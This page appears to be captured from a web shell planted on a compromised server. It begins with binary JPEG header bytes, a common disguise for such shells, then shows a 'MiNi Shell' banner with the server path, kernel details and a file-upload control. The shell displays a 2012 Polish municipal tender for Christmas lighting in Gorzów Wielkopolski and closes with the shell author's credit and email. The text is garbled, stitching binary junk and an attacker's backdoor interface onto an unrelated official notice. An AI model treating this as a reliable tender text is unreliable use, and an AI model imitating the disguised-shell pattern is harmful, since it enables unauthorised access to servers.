JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/269106-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: MONTAŻ, EKSPLOATACJA, DEMONTAŻ ORAZ PRZECHOWYWANIE ELEMENTÓW OŚWIETLENIA ŚWIĄTECZNEGO STANOWIĄCEGO MAJĄTEK MIASTA GORZOWA WLKP. W OKRESIE OD 15.08.2012R. DO 31.08.2013R. NA TERENIE MIASTA GORZOWA WLKP</b><br>
<b>Numer ogłoszenia: 269106 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MONTAŻ, EKSPLOATACJA, DEMONTAŻ ORAZ PRZECHOWYWANIE ELEMENTÓW OŚWIETLENIA ŚWIĄTECZNEGO STANOWIĄCEGO MAJĄTEK MIASTA GORZOWA WLKP. W OKRESIE OD 15.08.2012R. DO 31.08.2013R. NA TERENIE MIASTA GORZOWA WLKP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przechowywanie elementów oświetlenia świątecznego do momentu ich montażu, montaż wraz z podłączeniem do sieci elektroenergetycznej, paszportyzacja, eksploatacja, demontaż, inwentaryzacja, przechowywanie z jednoczesną naprawą i konserwacją w umownym okresie od 15.08.2012r do 31.08.2013r., na terenie Miasta Gorzowa Wlkp. 
Przedmiot zamówienia obejmuje następujące usługi: 
1. Przygotowanie kompletnego wniosku (wniosek winien zawierać m. in. harmonogram prac montażowych i demontażowych, załączniki graficzne, czasową organizację ruchu, opinię Komendanta Policji, opinię Oddziału Utrzymania Ruchu w Wydziale Infrastruktury Miejskiej UM Gorzów) o wydanie zezwolenia oraz naliczenie opłat za zajęcie pasa drogowego w celu prowadzenia robót polegających na montażu i demontażu elementów oświetlenia świątecznego w terminie do dnia 15.09.2012r. 
Uwaga! Ponieważ decyzję o zajęciu pasa drogowego i naliczeniu opłat wydaje sąsiednia gmina, całość procedury od momentu złożenia kompletnego wniosku do Samorządowego Kolegium Odwoławczego w Gorzowie Wlkp., do chwili wydania decyzji przez sąsiednią gminę wynosi ok. 2 m-ce. W związku z powyższym należy niezwłocznie po otrzymaniu zamówienia rozpocząć procedurę przygotowania wniosku! 
2. Przygotowanie załącznika graficznego do umowy z ENEA S.A, dotyczącej udostępnienia słupów oświetleniowych będących jej  majątkiem w celu zawieszenia na nich elementów oświetlenia świątecznego, zawierającego m. in. ilość słupów i ich lokalizację w terminie do 15.09.2012r. 
3. Protokolarne przejęcie od poprzedniego Wykonawcy w okresie: od 18.10.2012r.   do 31.10.2012r. elementów oświetlenia świątecznego na własny magazyn.
4. Przekazanie do utylizacji (utylizacja warunkowa)
a) napisu Wesołych Świąt i elementu świetlnego w postaci  Św. Mikołaj na saniach ciągniętych przez renifery - elementy wycofane z eksploatacji po sezonie świątecznym 2011-2012.,
b) elementów girland żarówkowych (tj. żarówki, oprawki,  przewody łączące), po uprzednim zdemontowaniu linek nośnych przeznaczonych do ponownego ich użycia m. inn. do montażu kurtynek SOPLE 152 białe LED - girlandy wycofane z eksploatacji po sezonie świątecznym 2011-2012.

Uwaga! Miasto czyni starania aby w/w elementy przeznaczone do utylizacji przekazać odpłatnie lub nieodpłatnie innym podmiotom. W przypadku braku chętnych do dnia 31.10.2012r. elementy należy przekazać niezwłocznie do utylizacji, po odebraniu ich z magazynu poprzedniego Wykonawcy, bez ich przechowywania.

5. Sprawdzenie i przygotowanie do rozwieszenia, z ewentualnym wykonaniem niezbędnych prac kompletujących poszczególne elementy i ich przetransportowanie do miejsca montażu. 
6. Wykonanie montażu łącznie z udekorowaniem oraz podłączeniem do sieci elektroenergetycznej w terminie od 26.11.2012r do dnia 05.12.2012r. następujących elementów oświetlenia świątecznego:
a)  10 świetlnych przewieszek o dł.20m każda zmontowanych z 40 szt. kurtynek SOPLE 152 białe LED o dł. 5m każda, umieszczonych w poprzek ulic Jagiełły i Wybickiego na latarniach oświetleniowych będących majątkiem ENEA S.A., 

Wykonawca zobowiązany jest do zmontowania świetlnych przewieszek wykorzystując jako element nośny część linek stalowych zdemontowanych z przeznaczonych do utylizacji girland żarówkowych, 
b) 3 sztuk kurtyn świetlnych białych LED o wym. 2x5m w taki sposób aby po zamontowaniu tworzyły formę kielicha w górnej części masztu oświetleniowego będącego majątkiem ENEA S.A., znajdującym się na rondzie Kosynierów Gdyńskich. 
c) 15 transparentów ozdobnych świetlnych o wymiarach h: 1,20m, długości 4,15m nad ulicami Gorzowa w rejonie staromiejskim wg wskazań Zamawiającego (m.inn. deptak - ul. Hawelańska, Wełniany Rynek, Pocztowa, Wodna) na wysokości 5 m, które składają się z 1.725 żarówek.
d) 4 drzew na Starym Rynku (kasztanowców czerwonych wysokości ok.12 metrów) ozdobami świetlnymi (łańcuchami świetlnymi ok.7.500 diod świetlnych  x 4 kasztanowce).
e)  1  choinki -świerk naturalny wysokości ok.14 metrów ustawionej na Starym Rynku, ozdobami świetlnymi,  łańcuchami składającymi się z diod świetlnych lub innych  typu LED w ilości do 50. 000 sztuk.
f) 1 drzewa - buk zwyczajny odmiana zwisająca wysokości ok. 15 m, na rondzie Ofiar Katynia ozdobami świetlnymi - łańcuchami świetlnymi ok.20.000 diod świetlnych.
g) 22 drzewek - głogi o wysokości do 5 metrów diodami świetlnymi przy    ul. Sikorskiego na odcinku od kościoła Katedralnego do ściany TESCO i przy TESCO.
h)  2  drzew 15 metrowych przy Empiku: 
-  ozdobami świetlnymi (łańcuchy świetlne długości ok. 500 metrów - diody   świetlne) 
-   przymocowanymi na drzewach 5  projektorami oświetlającymi konary
(gałęzie), sznurem świetlnym o długości 105 metrów, który składa się z        
150 żarówek 25W. 	
i) 43 szt. elementów świetlnych słupowych (gwiazdka), zamontowanych na latarniach oświetleniowych będących majątkiem Miasta, na wysokości ponad 4,50 m wzdłuż trasy Nadwarciańskiej.
j) 10 szt. elementów świetlnych słupowych (kurtyny świetlne), zamontowanych na latarniach oświetleniowych będących majątkiem Miasta  o wym. 2,85x1,50m na wysokości ponad 4,50 m wzdłuż Bulwaru Zachodniego n/ Wartą.
k) 9 sz. elementów świetlnych słupowych (gwiazdka) zamontowanych na latarniach oświetleniowych będących majątkiem Miasta,  na wysokości ponad 4,50 m wzdłuż Bulwaru Wschodniego n/ Wartą.
l) 38 szt. elementów świetlnych słupowych (gwiazdka) zamontowanych na latarniach oświetleniowych będących majątkiem ENEA S.A., elementów świetlnych (gwiazdka) na odcinku ul. Sikorskiego od skrzyżowania z ul. Pionierów w kierunku ul. Młyńskiej po obu jej stronach,  zamontowanych na słupach latarni oświetleniowych na wysokości ponad 4,50m.
ł) 2 szt. ozdób świetlnych (drzewka świetlne) na rondach miasta - Szczecińskm i Poznańskim.
7.  Wykonanie paszportyzacji zamontowanych elementów oświetlenia świątecznego.    
8. Prowadzenie bieżącej eksploatacji (całodobowej) rozwieszonych elementów oświetlenia świątecznego wraz z zakupem pomocniczych materiałów do ich naprawy na własny koszt   w okresie rozwieszenia od 05 grudnia 2012r.  do 06 stycznia 2013r. 

Uwaga! Oświetlenie świąteczne winno być wyłączone w dniu 07.01.2013r. 
po czym można przystąpić do jego demontażu. Za każdy kolejny dzień świecenia 
Wykonawca zostanie obciążony za nieuzasadnione zużycie energii elektrycznej.                                   

9. Demontaż elementów oświetlenia świątecznego po okresie rozwieszenia wraz z jego inwentaryzacją i transport do miejsca przechowywania w terminie od 07.01.2013r. do 17.01.2013r., 
10. Naprawa i konserwacja zużytych oraz uszkodzonych elementów w terminie     do 17.05.2013r. (wraz z zakupem pomocniczych materiałów do ich naprawy na  własny koszt), tak aby elementy oświetlenia świątecznego były w 100% sprawne do następnego okresu rozwieszenia.
11. Przekazanie do utylizacji zużytych elementów oświetlenia świątecznego w trakcie eksploatacji oraz podczas ich naprawy w terminie do 17.06.2013r.
12. Przechowywanie we własnym magazynie do momentu protokolarnego przekazania kolejnemu Wykonawcy w dniu 31.08.2013r.

Zamówienie należy realizować w oparciu o obowiązujące przepisy, instrukcje  i normy dotyczące robót elektroinstalacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt 6 stawy Pzp. Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień, opisanych w niniejszej SIWZ.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.10-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000,00 zł. (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykonali w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- co najmniej jedną usługę polegającą na montażu, demontażu, eksploatacji  i przechowywaniu oświetlenia świątecznego w ulicach miasta lub powiatu, lub gminy, itp. o wartości min. 90 000,00 zł brutto.
i załączyli dokumenty (np. Referencje) potwierdzające, że usługi te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują min. jedenym podnośnikiem do prac na wysokości  do 15m</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują:
 - min. 1 osobą posiadającą uprawnienia w zakresie dozoru nad eksploatacją urządzeń elektrycznych (osoba nadzorująca prace),
- min. 1 osobą posiadającą uprawnienia w zakresie eksploatacji urządzeń elektrycznych do  1 kV, dokonująca montażu, demontażu, napraw i konserwacji urządzeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 20.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców. 2.Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia 3. Zakres zamówienia, który zostanie zlecony podwykonawcom. 4.Dowód wniesienia wadium.5. Oświadczenie Wykonawcy, że posiada opłaconą polisę lub inny dokument potwierdzający, ze jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty.
Zmiana postanowień umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
a)zmiana terminu wykonania przedmiotu umowy w przypadku:
- działania osób trzecich uniemożliwiających realizację usługi,
b.zmiana wynagrodzenia w przypadku:
- zmian przepisów prawa  podatkowego,
- konieczność wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
c.osób odpowiedzialnych za wykonanie zamówienia w następujących przypadkach:
- niewywiązywanie się tych osób z powierzonych obowiązków,
- rezygnacji tych osób z wykonywania swoich obowiązków.
O wystąpieniu okoliczności, które mogą mieć wpływ na zmiany w umowie Wykonawca jest zobowiązany poinformować pisemnie Zamawiającego najpóźniej w terminie 7 dni od wystąpienia tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp.; ul. Sikorskiego 3-4; 66-400 Gorzów Wlkp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2012 godzina 10:00, miejsce: Urząd Miasta Gorzowa Wlkp. 66-400 Gorzów Wlkp. ul. Sikorskiego 3-4, Kancelaria Ogólna (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com